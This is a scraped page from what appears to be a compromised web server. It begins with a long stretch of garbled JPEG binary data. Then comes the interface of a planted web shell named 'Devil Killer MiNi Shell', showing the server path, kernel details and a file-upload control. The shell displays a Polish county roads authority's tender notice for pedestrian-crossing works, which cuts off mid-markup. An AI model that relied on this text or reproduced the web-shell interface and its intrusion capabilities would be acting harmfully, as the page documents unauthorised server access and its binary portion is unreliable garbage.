JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211027/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211027/0024752301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych na drogach powiatowych nr 0613 T w m. Pawłów i nr 0608 T w m. Radkowice Kolonia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Starachowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291019637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ostrowiecka 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starachowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">041 273 02 20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">041 273 02 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-starachowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-starachowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarząd dróg w odniesieniu do dróg powiatowych w zakresie planowania, budowy, modernizacji, utrzymania i ochrony dróg zgodnie z ustawą o drogach publicznych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych na drogach powiatowych nr 0613 T w m. Pawłów i nr 0608 T w m. Radkowice Kolonia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b13aa3d7-36ea-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00247523</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000483/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.35 Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych na drogach powiatowych nr 0613 T w m. Pawłów i nr 0608 T w m. Radkowice Kolonia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zdp-starachowice.pl oraz https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. <br/>	<br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/><br/>W przedmiotowym postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: <br/> <br/>	a)	miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/><br/>	b)	ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal,<br/> <br/>	c)	poczty elektronicznej adres e-mail: sekretariat@zdp-starachowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/><br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w:<br/><br/>a) Instrukcji użytkownika systemu miniPortal dostępnego pod adresem: https://miniportal.uzp.gov.pl/Instrukcje <br/><br/>b)	Regulaminie korzystania z systemu miniPortal pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi <br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/><br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji w zależności od obowiązkowej formy ich przekazania, przyjmuje się datę ich przekazania na ePUAP lub datę ich przekazania na pocztę elektroniczną (e-mail). <br/><br/>Zamawiający przekazuje ID postępowania jako załącznik do niniejszej SWZ. <br/><br/>Dane postępowanie można wyszukać również na Liście wszystkich postępowań na miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/><br/> W postępowaniu o udzielenie zamówienia składanie oświadczeń, wniosków (innych niż oferta oraz dokumenty i oświadczenia jakie Wykonawca ma złożyć wraz z ofertą wskazane w ust.9 SWZ), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal lub za pomocą poczty elektronicznej na adres e-mail: sekretariat@zdp-starachowice.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w ust.2 pkt. 1 SWZ oraz numerem ogłoszenia w Biuletynie Zamówień Publicznych lub ID postępowania. <br/><br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@zdp-starachowice.pl. <br/><br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 11.11. adres email.<br/><br/>Wykonawca sporządzi ofertę zgodne z wymogami Specyfikacji Warunków<br/>Zamówienia w formie elektronicznej opatrzonej podpisem kwalifikowanym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Oferta musi być sporządzona w języku polskim. Zamawiający zaleca sporządzenie oferty w formacie danych: pdf, doc, docx, rtf, xps, odt.<br/><br/>Formularz oferty na zadanie 1 stanowi załącznik nr 1a do SWZ, formularz oferty na zadanie 2 stanowi załącznik nr 1b do SWZ.<br/><br/>Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w Instrukcji użytkownika systemu miniPortal - ePUAP (dostępnej pod adresem: https://miniportal.uzp.gov.pl/Instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>	administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych, 27-200 Starachowice ul. Ostrowiecka 15;<br/><br/>	Inspektorem Ochrony Danych w Zarządzie Dróg Powiatowych w Starachowicach jest Pan Paweł Żłobecki, kontakt pod adresem email: pawel.zlobecki@wp.pl.<br/><br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr ZP.2510.15.2021<br/>pn: „Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych na drogach powiatowych nr 0613 T w m. Pawłów i nr 0608 T w m. Radkowice Kolonia”.<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. -Prawo zamówień publicznych (t.j. Dz. U. z 2021r. poz. 1129) „Ustawa Pzp”, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy Pzp; <br/><br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i ust. 2 z zastrzeżeniem art.74 ust. 3 i 4. Ustawy Pzp; <br/><br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/><br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 ust. 1-3 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących.<br/> Pan/Pani jest uprawniony/uprawniona do uzyskania od zamawiającego potwierdzenia czy przetwarzane są jego/jej dane osobowe, a jeżeli ma to miejsce jest uprawniony/ uprawniona do uzyskania dostępu do nich oraz informacji określonych w art. 15 ust.1-3 RODO. <br/>Zamawiający w celu wykonania powyższego obowiązku może żądać od Pana/Pani wskazania dodatkowych informacji mających na celu sprecyzowanie żądania <br/>w szczególności:<br/>podania nazwy lub daty postepowania o udzielenie zamówienia, lub <br/>podania nazwy lub daty zakończonego postepowania o udzielenie zamówienia publicznego;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/><br/>Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/ Pani na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych; <br/>Wystąpienie Pana/Pani z żądaniem ograniczenia przetwarzania danych osobowych <br/>nie ogranicza ich przetwarzania do czasu zakończenia postępowania o udzielenie zamówienia. Od dnia zakończenia postępowania o udzielenie zamówienia wniesienie powyższego żądania spowoduje ograniczenie przetwarzania Pana/Pani danych osobowych zawartych w protokole i załącznikach do protokołu. Zamawiający <br/>nie udostępni tych danych, chyba że zajdą przesłanki o których mowa w art. 18 ust. 2 RODO * <br/><br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/><br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2510.15.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 -	Budowa przejścia dla pieszych w miejscowości Pawłów, w ciągu drogi powiatowej nr 0613 T Starachowice – Adamów – Styków – Jabłonna – Dąbrowa – Pawłów<br/>Zamówienie obejmuje następujący zakres robót:<br/><br/>-	roboty rozbiórkowe (ręczna rozbiórka istniejącej nawierzchni chodnika oraz zjazdów, ręczna rozbiórka obrzeża betonowego, ręczna rozbiórka krawężnika betonowego, roboty ziemne wykonywane koparkami, bezinwazyjne usunięcie istniejącego oznakowania poziomego cienkowarstwowego);<br/>-	odtworzenie chodnika (ustawienie obrzeża betonowego, ustawienie krawężnika betonowego, wykonanie warstwy odcinającej z piasku stabilizowanego cementem, podbudowy z kruszyw, wykonanie chodnika z kostki brukowej, wykonanie pasów ostrzegawczych przed przejściem dla pieszych); <br/>-	oznakowanie i urządzenia bezpieczeństwa ruchu drogowego (znaki pionowe aktywne D-6 wraz z panelem słonecznym oraz konstrukcją nośną, słupki do znaków drogowych, wykonanie i ustawienie tablicy informacyjnej, oznakowanie poziome nawierzchni bitumicznych);<br/>-	doświetlenie przejścia dla pieszych.<br/><br/>Szczegółowy opis robót będących przedmiotem poszczególnych zadań zawierają Szczegółowe Specyfikacje Techniczne – rozdział IV SWZ oraz załączone do niniejszego postępowania Przedmiary robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</p> <p class="mb-0">45233294-6 - Instalowanie sygnalizacji drogowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Komisja dokona weryfikacji ofert złożonych na poszczególne części zamówienia. W przypadku gdy wykonawca nie złożył wymaganych w postępowaniu oświadczeń, dokumentów lub środków podmiotowych czy też są one niekompletne lub zawierają błędy, Zamawiający wezwie wykonawcę odpowiednio do złożenia, poprawienia lub uzupełnienia brakujących dokumentów. Komisja zweryfikuje oferty pod kątem przesłanek do odrzucenia na podstawie art.226 Ustawy, poprawi w ofertach zgodnie z art. 223 ust.2 Ustawy: oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, nie powodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona, a także zwróci się o ewentualne wyjaśnienia dotyczące treści złożonych ofert zgodnie z art. 223 ust. 1 Ustawy oraz ewentualne wyjaśnienia rażąco niskiej ceny, jeżeli zasadne jest wszczęcie procedury określonej w art.224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 -	Przebudowa przejścia dla pieszych w miejscowości Radkowice Kolonia, w ciągu drogi powiatowej nr 0608 T Siekierno - Radkowice - Rzepin Kolonia <br/><br/>Zamówienie obejmuje następujący zakres robót:<br/><br/>-	roboty rozbiórkowe (ręczna rozbiórka istniejącej nawierzchni chodnika, ręczna rozbiórka obrzeża betonowego, roboty ziemne wykonane koparkami, demontaż barierek ochronnych, demontaż tablic znaków drogowych, rozebranie słupków do znaków drogowych);<br/>-	odtworzenie chodnika (ustawienie obrzeża betonowego, wykonanie chodnika z kostki brukowej betonowej, wykonanie pasów ostrzegawczych przed przejściem dla pieszych);<br/>-	oznakowanie i urządzenia bezpieczeństwa ruchu drogowego (znaki pionowe aktywne D-6 wraz z panelem słonecznym, instalacją elektryczną oraz konstrukcją nośną, słupki do znaków drogowych, wykonanie i ustawienie tablicy informacyjnej, ustawienie barierek chodnikowych, oznakowanie poziome nawierzchni bitumicznych, wykonanie linii wibracyjno-akustycznych);<br/>-	doświetlenie przejścia dla pieszych.<br/><br/>Szczegółowy opis robót będących przedmiotem poszczególnych zadań zawierają Szczegółowe Specyfikacje Techniczne – rozdział IV SWZ oraz załączone do niniejszego postępowania Przedmiary robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</p> <p class="mb-0">45233294-6 - Instalowanie sygnalizacji drogowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Komisja dokona weryfikacji ofert złożonych na poszczególne części zamówienia. W przypadku gdy wykonawca nie złożył wymaganych w postępowaniu oświadczeń, dokumentów lub środków podmiotowych czy też są one niekompletne lub zawierają błędy, Zamawiający wezwie wykonawcę odpowiednio do złożenia, poprawienia lub uzupełnienia brakujących dokumentów. Komisja zweryfikuje oferty pod kątem przesłanek do odrzucenia na podstawie art.226 Ustawy, poprawi w ofertach zgodnie z art. 223 ust.2 Ustawy: oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, nie powodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona, a także zwróci się o ewentualne wyjaśnienia dotyczące treści złożonych ofert zgodnie z art. 223 ust. 1 Ustawy oraz ewentualne wyjaśnienia rażąco niskiej ceny, jeżeli zasadne jest wszczęcie procedury określonej w art.224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 